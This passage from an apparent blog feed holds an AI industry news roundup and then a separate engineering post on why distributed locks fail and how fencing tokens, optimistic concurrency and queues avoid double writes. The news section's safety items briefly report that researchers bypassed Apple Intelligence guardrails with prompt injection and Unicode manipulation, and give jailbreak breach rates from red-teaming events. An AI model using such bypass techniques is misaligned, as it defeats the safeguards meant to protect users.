Augment Code Intent tops SWE-bench Pro: Augment reached 51.80%, ahead of Cursor at 50.21%, Claude Code at 49.75%, and OpenAI Codex at 46.47%. Its architecture uses separate coordinator, specialist, and verifier agents, which is increasingly becoming the standard pattern for serious coding systems. Source: Augment Code Blog
Devin 2.0 slashes pricing: Cognition dropped Devin from $500/month to a $20/month Core tier plus $2.25 per ACU. It also claims a 67% PR merge rate. That price move matters more than the product update because it changes who can justify trying Devin again. Source: VentureBeat
AI coding is now a real market, not a side category: The market is estimated at $12.8B, up from $5.1B in 2024. Reported developer adoption is 84%, and AI is said to write 41% of all code. GitHub Copilot still holds the biggest share at roughly 37% with more than 20M users.

4. AI Companies & Startups

Q1 2026 venture funding hits $300B: That is an all-time record, and AI took 80% of it, or about $242B. Four mega-rounds dominated the quarter: OpenAI at $122B and an $852B valuation, Anthropic at $30B, xAI at $20B, and Waymo at $16B. The US captured 83% of the total. Source: Crunchbase
Perplexity ARR surges to $450M: The jump came after Perplexity leaned harder into AI agents through its "Computer" tool. Revenue rose 50% in a single month, and the company now claims 100M+ monthly active users. Source: PYMNTS
Eclipse Ventures raises $1.3B for physical AI: The focus is robotics, autonomous systems, and hardware rather than the usual software-layer story. Portfolio names include Cerebras, Wayve, and Bedrock Robotics. Source: TechCrunch
OpenAI looks closer to an IPO: OpenAI is now being discussed as an IPO candidate at an $852B valuation, with 900M weekly active users, $20B in annualized revenue, and a Q4 2026 target. It also completed its sixth acquisition of the year with TBPN. Source: OpenAI

5. Big Tech AI Moves

Anthropic: Project Glasswing + Mythos Preview (April 7-9): This is more than a model release. Anthropic says Mythos can autonomously discover zero-days, including a 27-year-old OpenBSD bug, a 17-year-old FreeBSD RCE tracked as CVE-2026-4747, and 181 Firefox exploits. The model was distributed to 12 partners including Apple, Google, Microsoft, AWS, CrowdStrike, and Palo Alto Networks for defensive use only, along with $100M in credits and $4M for open-source security. Source: Anthropic
Meta: Muse Spark + $115-135B AI capex (April 8): Meta's first proprietary flagship model is a clear break from the open Llama era. The company plans to push Muse Spark across Facebook, Instagram, WhatsApp, and Ray-Ban glasses while nearly doubling AI capex for 2025. Source: TechCrunch
Microsoft: 3 MAI foundation models (April 2): Microsoft announced MAI-Transcribe-1, MAI-Voice-1, and MAI-Image-2. The bigger story is strategic: Microsoft is still partnered with OpenAI, but these launches make its effort to reduce dependency much more visible. Source: Microsoft AI
OpenAI: "Spud" in safety eval (April 6-10): OpenAI's next major model, likely GPT-5.5 or GPT-6, appears to have completed pretraining on March 24 and is now in safety evaluation. At the same time, OpenAI is expanding Codex pay-as-you-go seats, rolling out ChatGPT CarPlay integration, and pushing a Child Safety Blueprint. Source: OpenAI News
Google: Gemini 3.1 Pro rollout + Gemma 4 family: Google kept pushing on both ends of the stack. Gemini 3.1 Flash Live reached 90.8% on ComplexFuncBench Audio, and a new KV-cache compression algorithm reportedly cuts memory usage by 6x. Source: Google AI

6. Open Source AI

OpenAI gpt-oss — the company's first open-weight models (Apache 2.0): OpenAI released gpt-oss-120b, with 117B total parameters and 5.1B active parameters, plus gpt-oss-20b, which is small enough to run on 16GB edge devices. OpenAI says performance is near o4-mini on reasoning. Strategically, this is one of the biggest reversals of the year. Source: OpenAI
GLM-5.1 (Z.ai, MIT license): Beyond benchmark performance, GLM-5.1 stands out because it supports autonomous agent loops for up to 8 hours, or roughly 1,700 continuous steps, and because it was trained on Huawei Ascend 910B chips. Source: BuildFastWithAI
PrismML Bonsai 8B — a viable 1-bit LLM (Apache 2.0): Bonsai is only 1.15 GB for an 8B model, which is around 14x smaller than a typical equivalent. PrismML claims it is 8x faster and 5x more energy efficient because it was trained natively at 1-bit rather than quantized after the fact. Source: The Register
Google Gemma 4 (Apache 2.0): Google expanded Gemma into four variants, including 31B, 26B MoE, E4B, and E2B. The family is natively multimodal, has passed 400M downloads, and now has more than 100K community variants. Source: Google Blog
The open model trend is getting clearer: Five of the six major open models now use MoE architectures. The gap between open and proprietary models is down to single digits on many benchmarks, and licensing is settling around Apache 2.0 and MIT.

7. AI Research & Papers

AI Scientist-v2 (Sakana AI): Sakana says this is the first fully AI-generated paper to pass peer review at an ICLR workshop. The system uses progressive agentic tree search and no human code templates, and the work was published in Nature. Source: arxiv 2504.08066
TurboQuant (Google Research, ICLR 2026): TurboQuant claims 6x KV-cache memory reduction and 8x attention speedup at 3-4 bits, with no accuracy loss and no retraining. If that holds up in production, it is the kind of result that changes deployment economics overnight. Source: Google Research
Neuro-Symbolic VLA with 100x lower energy use (Tufts): The reported numbers are hard to ignore: 95% task success versus 34% for conventional VLAs, at 1% of the training energy, plus 78% success on unseen variants where standard models scored 0%. Source: ScienceDaily
Recursive Language Models / RLMs (Prime Intellect): RLMs let LLMs manage their own context through a Python REPL and delegated sub-LLMs. The headline claim is that they hold performance at 1.5M characters where standard long-context approaches break down. Source: Prime Intellect
2026 is starting to look like a breakthrough year for world models: DeepMind is reportedly allocating 50% of its resources to algorithmic innovation, and efficiency gains from better algorithms are now producing 4-17x improvements over brute-force scaling.

8. AI Impact on Jobs & Work

AI is now the top reason cited for US job cuts: Challenger reports 15,341 AI-related cuts in March alone, which is 25% of the total, and 27,645 year to date. Since 2023, the running total is 99,470. In tech specifically, cuts are at 52,050 year to date. Source: Challenger
The productivity paradox keeps getting stronger: A Multitudes study of 500+ developers found 27.2% more merged PRs but also a 19.6% increase in out-of-hours commits. Anthropic found that AI-assisted engineers scored 17% lower on comprehension tests. Google DORA says 90% of teams use AI, but many also report higher delivery instability. Source: Scientific American
Software engineering jobs are not disappearing, but they are changing: Indeed listings are up 11% annually and the BLS still projects 15% growth by 2034. At the same time, companies adopting AI are cutting junior hiring by 9-10% within six quarters, and 65% of developers expect their roles to be redefined in 2026. Source: CNN
METR says measuring developer productivity is getting harder, not easier: In its latest update, 30-50% of developers refused to submit tasks without AI access, which broke the original A/B testing setup. That matters because METR's 2025 randomized trial had found AI caused a 20% slowdown, even while developers thought they were about 20% faster. Source: METR

9. AI Infrastructure & Compute

NVIDIA Vera Rubin platform moves toward production: NVIDIA detailed six new chips, including the Rubin GPU at 50 PFLOPS NVFP4, the Vera CPU, and NVLink 6 at 3.6 TB/s per GPU. The company is promising a 10x reduction in inference token cost versus Blackwell, with availability in H2 2026. Source: NVIDIA
CoreWeave lands an $8.5B GPU loan and a $21B Meta partnership: This is one of the largest infrastructure financing stories in AI so far and a reminder that compute access is becoming a capital-markets problem, not just an engineering one. Source: Bloomberg
Sitecove's SHIP protocol claims a 91% GPU reduction: The claim is eye-catching: cost falling from $49 to $4 per million tokens. It is still unvalidated, so this belongs in the "watch closely" bucket rather than the "believe immediately" bucket. Source: FNArena
Silicon Data launches a GPU forward curve: This is the first standardized pricing index for A100, H100, and B200 capacity. The surprising conclusion is that long-term contracts are not always cheaper than spot pricing. Compute is starting to behave like a true commodity market. Source: SiliconAngle
Inference now dominates compute: Deloitte estimates that inference will consume two-thirds of all AI compute in 2026. Data center capex is projected to hit $750B, up from $450B in 2025, and power scarcity is now the main bottleneck.

10. AI Safety & Alignment

Project Glasswing (Anthropic, April 7-9): If Anthropic's numbers are accurate, this is the clearest example yet of capability-gated release. Mythos allegedly discovered thousands of zero-days across major operating systems and browsers, including 181 Firefox exploits versus 2 for Opus 4.6. Simon Willison called it "an industry-wide reckoning in the making," which does not feel exaggerated. Source: Anthropic
Anthropic RSP v3.0 removed its hard pause commitment: Anthropic replaced binding pause conditions with more aspirational language, which critics see as a concession to competitive pressure. Source: TIME
Apple Intelligence guardrails were bypassed: Researchers used a combination of "Neural Exect" prompt injection and Unicode manipulation to get past the safeguards. Apple patched the issue in iOS and macOS 26.4. The broader lesson is that on-device AI is not automatically safer. Source: SecurityWeek
Every major model still gets jailbroken: Gray Swan Arena has now seen 2,000 red-teamers run 2M attacks against 22 models, resulting in 62,000 breaches and $171K in bounties. Repello's numbers put GPT-5.1 breach rates at 28.6%, GPT-5.2 at 14.3%, and Claude Opus 4.5 at 4.8%. Multi-turn attack chains are where the real risk sits. Source: Gray Swan
AI agent liability is still unresolved: Gartner estimates decision errors from AI agents will create $10B in remediation costs by mid-2026, and there is still no clear legal framework for autonomous harm. Source: The Register

11. AI Policy & Regulation

Trump AI EO 14365 is stalling in implementation: Deadlines from March 11 were missed across Commerce, the FCC, and the FTC, and the DOJ's AI Litigation Task Force has not filed a case yet. The gap between federal rhetoric and actual enforcement is getting harder to ignore. Source: Consumer Finance Monitor
California is moving in the opposite direction: Governor Newsom signed EO N-5-26, which adds AI procurement standards around bias prevention and civil rights protections. It is explicitly framed as a response to federal deregulation, and California remains the largest state procurement market in the country. Source: Governor's Office
The EU AI Act is four months away from enforcement: Starting August 2, 2026, high-risk system obligations kick in, employment AI counts as high-risk, and regulatory sandboxes become mandatory. Penalties can reach 35M euros or 7% of global turnover. Source: EU AI Act
The GSA's proposed "American AI Systems" clause is worth watching: The draft requires US-developed AI, preserves government ownership of government data, mandates 72-hour breach reporting, and pushes liability to prime contractors. It is expected in Spring 2026. Source: Holland & Knight
State-level regulation is getting crowded fast: More than 600 AI bills are active across US states. Indiana, Utah, and Washington have already enacted healthcare AI protections, Colorado's AI Act takes effect on June 30, and NIST has launched an AI Agent Standards Initiative. Source: Gunderson Dettmer

12. Multimodal & Emerging Capabilities

LG EXAONE 4.5 (LG AI Research, April 9): LG's 33B vision-language model posted a 77.3 average on STEM benchmarks, edging out GPT-5-mini at 73.5, Claude 4.5 Sonnet at 74.6, and Qwen-3 235B at 77.0. The architecture uses a hybrid attention design, and LG open-sourced it. Source: PR Newswire
Tencent HY-Embodied-0.5 (April 9): Tencent released open-source robotics foundation models in two variants, a smaller MoT-2B edge model and a 32B full model. The core idea is a Mixture-of-Transformers approach for spatial and temporal perception. Source: GitHub
Sora is shutting down on April 26: The economics apparently never worked. Reports suggest Sora was burning about $15M a day in compute, or $5.4B annualized, against only about $2.1M in lifetime revenue. Google Veo 3.1 and SkyReels V4 are already moving into the gap. Source: TechCrunch
Gemma 4 E2B brings multimodal AI to phones: Google says the model can handle text, image, and audio workloads in under 1.5GB of RAM, supports 140+ languages, and ships with a 256K context window. Source: Google Blog

Sources Referenced

Official AI Company Sources

Research & Deep Analysis

Industry & News

Policy & Regulation

Community & Developer

Distributed Locks Are a Code Smell

Anil Kurmi — Fri, 03 Apr 2026 09:47:08 +0000

Distributed Locks Are a Code Smell

The Lock That Lied

A single angry support ticket is usually an anomaly. Three identically angry support tickets arriving within 60 seconds about the exact same missing money? That is a pattern. Last quarter, our supposedly bulletproof payment pipeline successfully charged a single customer three times for one order. The investigation dragged on for hours, but the root cause took only four minutes to explain.

Here's what actually happened. Service A acquired a Redis lock with a 10-second TTL to process a payment. Right in the middle of executing, the JVM triggered a stop-the-world garbage collection. The entire process froze for 12 seconds. It didn't crash. It didn't log anything. It just... stopped.

While Service A was completely frozen, the lock expired in Redis. Service B picked up the very same lock, processed the exact same payment, and committed the charge. Seconds later, Service A woke up from its GC pause. It had absolutely no idea the lock was gone. It happily finished processing and committed the charge a second time.

Two microservices. Both believed they held the exclusive lock. Both were right — just at different points in time. The customer paid three times because a third container hit the same fate milliseconds later during a sudden traffic spike.

This isn't some theoretical academic edge case. This is exactly what distributed locks do in production. They wrap a warm, fuzzy blanket of safety around your architecture while hiding a massive trapdoor right underneath you.

Why Distributed Locks Are Nothing Like Local Locks

When you type synchronized in a Java application or lock() in Go, you receive a hard, physical guarantee. The operating system and the CPU strictly enforce mutual exclusion. Two threads literally cannot hold the same mutex simultaneously. The laws of physics back you up — there is only one physically shared piece of memory, and the hardware executes an atomic compare-and-swap instruction.

A distributed lock gives you absolutely none of this.

There is no shared memory between your services. You don't have reliable clocks. Your servers' clocks drift constantly, NTP daemons can jump time forward or backward randomly, and cloud VMs can stall for seconds without any warning to the guest OS. You don't even have guaranteed message delivery. The GitHub infrastructure team famously documented an incident where network layer packets were delayed for 90 seconds.

A local mutex provides a guarantee. A distributed lock provides an opinion. It represents the lock service's best guess that you probably still hold the lock right now. But "probably" and "right now" are doing a tremendous amount of heavy lifting.

The moment you accept that a distributed lock is fundamentally an approximation, you naturally start asking the right question: what actually happens when two processes both think they hold the lock at the same time?

The Kleppmann vs Antirez Debate (The 5-Minute Version)

Back in 2016, Martin Kleppmann (who wrote Designing Data-Intensive Applications) published a deep analysis of the Redlock algorithm. Salvatore Sanfilippo (antirez, the creator of Redis) wrote a rebuttal. The exchange between them remains one of the greatest, most important debates in distributed systems engineering. Here is the short version of what you need to know.

What Redlock claims to provide. The algorithm relies on 5 independent Redis nodes. A client attempts to acquire the lock on a majority (at least 3), using clock-based expiry to ensure the lock eventually releases. Antirez designed it specifically to survive individual node failures.

Kleppmann's critique. He pointed out two massive holes:

No fencing tokens. Redlock does not generate a monotonically increasing number every time a client acquires a lock. Without this token, a storage system has no possible way to reject stale writes from a process that thinks it still owns the lock but actually doesn't.
Timing assumptions. Redlock assumes bounded network delay, bounded process pauses, and bounded clock error. Real production systems violently violate all three. A garbage collection pause of 30 seconds, a sudden NTP clock jump, or a 90-second network delay will easily cause two clients to hold the "lock" simultaneously.

Antirez's response. He pushed back, arguing that Redlock explicitly checks the elapsed time before and after acquiring the majority. This makes it immune to delays during the acquisition itself. He also proposed that random unique tokens could substitute for monotonic counters if you use check-and-set operations. Finally, he conceded that Redis really should switch to monotonic time APIs.

The verdict. Here's the thing: both sides are absolutely right, depending on what you're trying to do. Antirez is perfectly correct that for many practical use cases — like preventing duplicate cron jobs or stopping cache stampedes — Redlock works just fine. Kleppmann is equally correct that if you care about strict data safety, Redlock's guarantees fall short. The question you should ask isn't "is Redlock safe?" but rather "safe enough for what?"

If you just want to prevent wasted CPU cycles, Redlock operates perfectly. If you want to prevent corrupted databases or duplicate customer charges, it fails completely. The problem I see is that most engineers reaching for distributed locks don't know which outcome they actually need.

Two Types of Locks (This Is the Key Insight)

Martin Kleppmann's framing here is the single best mental model for distributed locking I've ever found. Every single time you consider reaching for a lock, stop and ask yourself: is this for efficiency or correctness?

Efficiency Locks: "Don't Do Expensive Work Twice"

The whole goal here is preventing duplicate computation, not preventing data corruption. If your lock mysteriously fails and two processes run the job, you just waste some CPU cycles. Nobody loses real money. Nobody overwrites critical data.

Examples:

Cache stampede prevention. A hundred concurrent requests hit a newly expired cache key. You just want one worker to recompute the payload, not all hundred.
Job deduplication. A daily cron job triggers across three nodes. You want it to execute exactly once, not three times.
Rate limiting. You want roughly one API call per second, not a mathematically perfect single execution.

For these cases, a simple Redis SETNX with a TTL does exactly what you need:

SET lock:rebuild-cache "worker-7a3f" NX EX 30

That's it. One Redis node. No Redlock complexity. No intense consensus algorithm required. If it randomly fails, you rebuild the cache twice. The world keeps spinning just fine.

Correctness Locks: "Don't Corrupt My Data"

This time, the goal is strict mutual exclusion to ensure data safety. If the lock fails and two processes operate simultaneously, bad things happen. You see double charges, corrupted financial states, lost writes, or oversold inventory.

I learned this the hard way, so I'll give you the uncomfortable truth: you don't actually need a lock for this. You need a fencing token.

Why? Because a lock will eventually be "held" by two processes simultaneously in production. The garbage collection pause scenario isn't some exotic theoretical event. It's just a normal Tuesday. Any of the following triggers it:

JVM garbage collection (stop-the-world pauses often last minutes on large heaps)
Container CPU throttling when Kubernetes gets overloaded
VM stalls in multi-tenant cloud environments
Network partitions where the locking service communicates fine with both clients, but the clients can't reach each other
NTP clock jumps forcing a lock to expire prematurely on one specific node

When your system's correctness depends on perfect mutual exclusion, and that mutual exclusion relies on perfect clocks and flawless networks, your correctness essentially depends on perfect clocks and flawless networks. You do not want your career depending on that.

Fencing Tokens: The Right Abstraction for Correctness

A fencing token is simply a monotonically increasing number generated every single time a lock is granted. The client holding the lock passes this token down to the storage layer with every write request. The storage layer keeps track of the highest token it has ever seen and aggressively rejects any write carrying a lower or equal token.

This represents a critical shift in your architecture: the central storage system becomes an active, enforcing participant in safety, rather than just a passive victim accepting writes from whoever shows up last.

Let's walk through how this works in a real crash scenario:

Process A asks ZooKeeper for a lock. ZooKeeper grants it and hands back fencing token 33.
Process A initiates a slow write to the database, actively including token 33 in the payload.
Process A gets hit with a massive GC pause. It freezes completely.
The lock lease times out. Process B comes along and acquires the lock, receiving fencing token 34.
Process B writes to the database with token 34. The database accepts it and records 34 as the new high-water mark.
Process A finally wakes up. It attempts to finish its write using token 33.
The database sees that 33 < 34. It outright rejects Process A's write.

No data corruption. No double charging the customer. Even though the lock effectively "lied" — even though both processes genuinely believed they owned the lock at the same time — the fencing token caught the violation at the absolute lowest layer.

The implementation in a relational database like PostgreSQL is remarkably straightforward:

-- Add a fencing column to your table
ALTER TABLE orders ADD COLUMN lock_token BIGINT DEFAULT 0;

-- Write only if our token is the highest
UPDATE orders
SET status = 'processed', lock_token = 34
WHERE id = 42 AND lock_token < 34;
-- Rows affected: 1 (success) or 0 (stale token, rejected)

If you use ZooKeeper, the znode's zxid (transaction ID) naturally acts as a perfect fencing token because it explicitly increases monotonically with every single state change. If you use etcd, the lease's revision number serves the exact same purpose.

The Decision Tree: What Do You Actually Need?

Before you install a shiny new distributed lock library, walk yourself through this tree:

I watch most engineering teams jump straight to the bottom-right corner. Start at the top instead. You'll be genuinely surprised how frequently you can exit the tree much earlier.

Five Alternatives That Are Usually Better

1. Single-Writer Architecture

The absolute simplest way to avoid the headache of distributed locks is to stop distributing your writes in the first place.

Route every single write for a specific entity (or partition) through just one process. Kafka consumer groups handle this natively — each partition gets tied to exactly one active consumer in the group. If all updates for customer 42 always route to partition 42 % N, you guarantee serial processing without a drop of external coordination.

This isn't some hacky workaround. It's the exact architectural foundation behind heavy-duty systems like Kafka Streams, Akka Cluster Sharding, and Orleans virtual actors. The "lock" effectively becomes the partition assignment itself.

2. Optimistic Concurrency Control (CAS)

Let every process try to write at the same time. Reject the stale writes at the database layer. This works incredibly well when conflicts are rare. And in the vast majority of normal CRUD applications, they are extremely rare.

-- Read the current version
SELECT id, balance, version FROM accounts WHERE id = 42;
-- Returns: id=42, balance=100, version=7

-- Write only if version hasn't changed
UPDATE accounts
SET balance = 80, version = 8
WHERE id = 42 AND version = 7;
-- Rows affected: 1 (success) or 0 (conflict, retry)

DynamoDB has this built right into its core API using conditional expressions:

{
  "TableName": "Orders",
  "Key": { "orderId": { "S": "order-42" } },
  "UpdateExpression": "SET #s = :new_status, #v = :new_version",
  "ConditionExpression": "#v = :expected_version",
  "ExpressionAttributeNames": { "#s": "status", "#v": "version" },
  "ExpressionAttributeValues": {
    ":new_status": { "S": "processed" },
    ":new_version": { "N": "8" },
    ":expected_version": { "N": "7" }
  }
}

No external lock. No expiring TTLs. No terrifying vulnerability to GC pauses. If two processes race, one succeeds and the other immediately retries. The database acts as the strict arbiter, completely eliminating the need for a separate lock service.

3. Queue-Based Serialization

Dump your operations into an ordered queue. Process them strictly sequentially. The queue itself guarantees the ordering, not an external lock.

You desperately want this pattern when the operations are naturally sequential anyway. Think payment processing, inventory decrements, or state machine transitions. Instead of running a complex loop of "acquire lock, read state, modify, write, release lock," you simply shift to "enqueue operation, let the single processor read from queue, apply sequentially."

AWS SQS FIFO queues, Kafka topics configured with a single partition per entity, or honestly just a simple Redis list using LPUSH and BRPOP serve this purpose brilliantly. You shift the complex serialization point completely away from a fragile lock and into a durable queue instance.

4. Database-Level Advisory Locks

If all your writers share a single PostgreSQL database, you already own a phenomenal lock service. It's called PostgreSQL.

-- Acquire an advisory lock (blocks until available)
SELECT pg_advisory_lock(hashtext('order-42'));

-- Do your critical work
UPDATE orders SET status = 'shipped' WHERE id = 42;

-- Release the lock
SELECT pg_advisory_unlock(hashtext('order-42'));

Advisory locks release automatically the moment the session drops. A violently crashed process physically cannot leave behind a zombie lock (unlike Redis without a careful TTL strategy). They also tie directly into PostgreSQL's standard deadlock detection engine. Most importantly, they add absolutely zero new infrastructure to your stack. No Redis clusters to maintain, no ZooKeeper ensembles to monitor.

The main limitation is obvious: they only work when all your writers talk exclusively to that same database instance. If you run heavily decoupled microservices with isolated databases, this won't help you at all. But if you do share a database — and let's be honest, many teams do — this is simply the correct, easiest answer.

5. Lease + Fencing Token

When your architecture genuinely demands pure distributed mutual exclusion for raw correctness, and none of the alternative patterns fit your constraints, you use a lease-based lock paired with a fencing token. I call this the "last resort" option. Not because the pattern is flawed, but strictly because it brings the highest operational complexity.

Here is ZooKeeper's standard recipe:

// Create an ephemeral sequential znode
String lockPath = zk.create(
    "/locks/order-42/lock-",
    data,
    ZooDefs.Ids.OPEN_ACL_UNSAFE,
    CreateMode.EPHEMERAL_SEQUENTIAL
);

// The zxid is your fencing token
long fencingToken = zk.exists(lockPath, false).getCzxid();

// Pass the token to your storage layer
orderService.process(orderId, fencingToken);

And with etcd:

# Create a lease (TTL = 30 seconds)
etcdctl lease grant 30
# lease 694d7c3b6cc3c01a granted with TTL(30s)

# Acquire the lock with the lease
etcdctl lock order-42 --lease=694d7c3b6cc3c01a
# order-42/694d7c3b6cc3c01b  <-- the revision is your fencing token

# Keep the lease alive while processing
etcdctl lease keep-alive 694d7c3b6cc3c01a

The absolute key here: you must always pass the fencing token (the zxid or the revision) downstream and explicitly validate it at the final storage layer.

The Implementation Guide: Fencing Tokens with ZooKeeper/etcd

If you walked through the decision tree and confirmed you genuinely need a distributed lock with fencing, here is the exact implementation pattern you must follow.

Step 1: Acquire a lease with a monotonic identifier.

ZooKeeper's ephemeral sequential znodes automatically give you a czxid that ticks upward with every transaction. etcd's lock command explicitly returns a revision number. Both systems provide monotonically increasing, globally ordered tokens.

Step 2: Pass the token to every downstream write.

Your process holding the lock must never write to underlying storage without physically including the fencing token. Treat it exactly like a request header — it travels alongside every single operation inside your critical section.

Step 3: Validate at the storage layer.

The storage layer (your database, object store, or downstream API) absolutely must reject writes carrying a token lower than the highest one it has previously seen:

def write_with_fencing(storage, key, value, token):
    current_token = storage.get_token(key)
    if token <= current_token:
        raise StaleTokenError(
            f"Token {token} is stale (current: {current_token})"
        )
    storage.put(key, value, token)

Step 4: Handle lease expiry gracefully.

When your background lease expires, you must cleanly stop all ongoing writes immediately. Do not simply assume the database work you started can safely complete. Actively check the lease status right before each write step, and strictly design your critical section to be as short as humanly possible.

The most common disaster I see is developers acquiring the lock, doing five heavy minutes of computation, and then eagerly writing the result. By the time you trigger the write, the lock is completely gone. Do this instead: acquire the lock quickly, write your state immediately, and release the lock. Move the massive computation blocks entirely outside of the critical section.

When You Actually Need a Distributed Lock

I realize I've spent an entire article aggressively telling you not to use distributed locks. Let me be clear: there are real scenarios where you genuinely need one.

Leader election for singleton processes. You specifically need exactly one background scheduler, one cluster rebalancer, or one job coordinator running at any time. This represents a perfectly legitimate use of distributed mutual exclusion. ZooKeeper and etcd were literally built for this exact task.

Distributed resource coordination. You manage a tight pool of expensive external resources (like costly GPU instances or strict licensed API connections) that you absolutely cannot over-allocate. A lease-based lock with strict fencing handles this beautifully.

Cross-service state machine transitions. When a complex operation spans multiple distinct microservices and must never be duplicated (not just made idempotent — you physically cannot safely duplicate it), a lock combined with a fencing token correctly protects the state transition.

But here is the thing. Even in these specific cases, strongly prefer lease-based approaches paired with fencing tokens over simple TTL-based Redis locks. The lease natively gives you automatic safety releases on failure. The fencing token guarantees your data stays safe even when the lease inevitably lies to you.

The Checklist Before Reaching for a Lock

Print this list out. Tape it directly next to your monitor. Force your team to consult it every single time someone proposes tossing a new distributed lock into your architecture.

Is this for efficiency or correctness? If it's just for efficiency, a single Redis SETNX with a TTL does the job. Stop right here.
What happens if two processes hold the "lock" simultaneously? If the honest answer is "we waste some minor compute cycles" — congratulations, you want an efficiency lock. If the answer is "we corrupt user data" — you need fencing tokens, not just a bare lock.
Can I use a single-writer architecture? Partition your data physically. Route all writes through exactly one process per partition. You eliminate the lock entirely.
Can I use optimistic concurrency (CAS)? Push version numbers, ETags, or conditional writes. Let the database safely arbitrate conflicts. You eliminate the lock entirely.
Can I use a queue? Serialize your operations through an explicitly ordered queue. You eliminate the lock entirely.
If I absolutely must lock: am I using fencing tokens? A lock without fencing tokens represents a lock stripped of safety. Use ZooKeeper's czxid or etcd's revision numbers.
Have I explicitly tested the failure mode where the lock holder pauses for 30 seconds? If you haven't, you haven't truly tested your lock. GC pauses, aggressive container throttling, and VM stalls aren't edge cases. They happen constantly.

The next time an engineer on your team casually says, "we just need a distributed lock," treat it just like a code smell in a pull request. It isn't necessarily wrong by default — but it demands deep investigation. The lock might somehow be the right answer for your specific pain. But far more often than not, it merely masks a symptom of a system design that hasn't yet discovered the correct underlying abstraction.

Sources & Further Reading

The Kleppmann/Antirez Debate:

How to do distributed locking -- Martin Kleppmann -- The foundational critique of Redlock and the efficiency/correctness framework
Is Redlock safe? -- antirez -- Salvatore Sanfilippo's response defending Redlock

Implementation & Patterns:

Distributed Locks with Redis -- Redis Documentation -- Official Redis documentation on the Redlock algorithm
Distributed Locking: A Practical Guide -- Oskar Dudycz -- Comprehensive comparison of Redis, ZooKeeper, etcd, and database locks
Fencing Tokens and Distributed Locking -- Rakan -- Clear explanation of the fencing token mechanism

Production War Stories:

Using a distributed lock in production -- Victor On Software -- Real-world incident with Google Calendar API callbacks
Distributed Locks: Why Microservices Need Them and Why They Still Fail -- Vinayak Chobe -- FinTech duplicate charges and e-commerce overselling incidents

Database Advisory Locks:

PostgreSQL: Explicit Locking Documentation -- Official PostgreSQL documentation on advisory locks
Distributed Locking with Postgres Advisory Locks -- Richard Clayton -- Practical guide to using PostgreSQL for distributed coordination

Books:

Designing Data-Intensive Applications by Martin Kleppmann -- Chapter 8 (The Trouble with Distributed Systems) and Chapter 9 (Consistency and Consensus) cover the foundations of everything in this article